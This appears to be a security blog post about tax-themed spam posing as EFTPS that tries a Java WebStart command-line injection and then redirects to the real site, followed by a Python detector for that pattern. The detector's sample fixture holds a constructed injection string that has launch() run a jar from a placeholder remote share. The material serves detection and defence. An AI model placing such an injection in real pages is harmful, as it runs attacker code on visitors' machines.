Today we noticed some unusual-looking messages claiming to be from the Electronic Federal Tax Payment System (EFTPS). Spam with a tax theme always piques our curiosity, so we took a closer look.
De-obfuscating the script reveals code that attempts to exploit a known Java vulnerability (Java WebStart Arbitrary Command Line Injection).
Following the exploit attempt, the browser is redirected to the real EFTPS site to add a touch of realism:
This particular attack wasn’t successful on our test system, so we were unable to discern what the ultimate payload of the attack was. However, the attack is a prime illustration of cybercriminals’ willingness to target Java, a trend we noted in our last Security Labs Report. Like Flash, Java is ubiquitous: most people have it installed, yet many are unaware that it is there, let alone whether it is up to date.
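As an added example (not code from the original post, whose de-obfuscated script is not reproduced here), a small detector for the two things described above: a JNLP URL handed to the Java Deployment Toolkit's launch() with extra -J switches appended, which is the shape of the WebStart command-line injection (CVE-2010-0886), and the decoy redirect to the real EFTPS site. The page fragment is constructed, and all host names are placeholders.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample fragment modelled on the class of attack the post
# describes: the Deployment Toolkit's launch() receives a JNLP URL with
# javaws -J switches appended, then the page bounces to the real EFTPS
# site. Host names are placeholders; this is NOT the actual spam script.
SAMPLE_HTML = r"""
<object id="dt"></object>
<script>
  var u = "http://example.invalid/app.jnlp -J-jar -J\\example.invalid\share\evil.jar none";
  document.getElementById("dt").launch(u);
  window.location = "https://www.eftps.gov/";
</script>
"""

# Benign comparison: a JNLP launch with no trailing switches and no redirect.
BENIGN_HTML = r"""
<script>document.getElementById("dt").launch("http://example.invalid/app.jnlp");</script>
"""

# A JNLP URL followed by one or more whitespace-separated -J options.
# A legitimate launch URL never carries javaws command-line switches.
INJECTION_RE = re.compile(r'(https?://\S+?\.jnlp)((?:\s+-J\S+)+)', re.IGNORECASE)

# Script-driven navigation to the site being impersonated (the decoy).
REDIRECT_RE = re.compile(r'location(?:\.href)?\s*=\s*["\']https?://([^/"\']+)', re.IGNORECASE)


def find_jnlp_arg_injection(html: str) -> List[Tuple[str, List[str]]]:
    """Return (jnlp_url, [injected -J switches]) for every suspicious launch."""
    return [(url, args.split()) for url, args in INJECTION_RE.findall(html)]


def redirect_hosts(html: str) -> List[str]:
    """Return the host names the page assigns to window.location."""
    return [h.lower() for h in REDIRECT_RE.findall(html)]


def classify(html: str, decoy_host: str = "www.eftps.gov") -> Dict[str, object]:
    """Combine both signals into a verdict a mail or web gateway could log."""
    hits = find_jnlp_arg_injection(html)
    decoy = decoy_host in redirect_hosts(html)
    return {
        "jnlp_injection": hits,
        "decoy_redirect": decoy,
        "verdict": "block" if hits else ("review" if decoy else "allow"),
    }


if __name__ == "__main__":
    print(classify(SAMPLE_HTML))   # verdict: block
    print(classify(BENIGN_HTML))   # verdict: allow
```

The redirect alone only earns a "review" verdict, since linking to a real government site is not malicious by itself; the injected switches are the blocking signal.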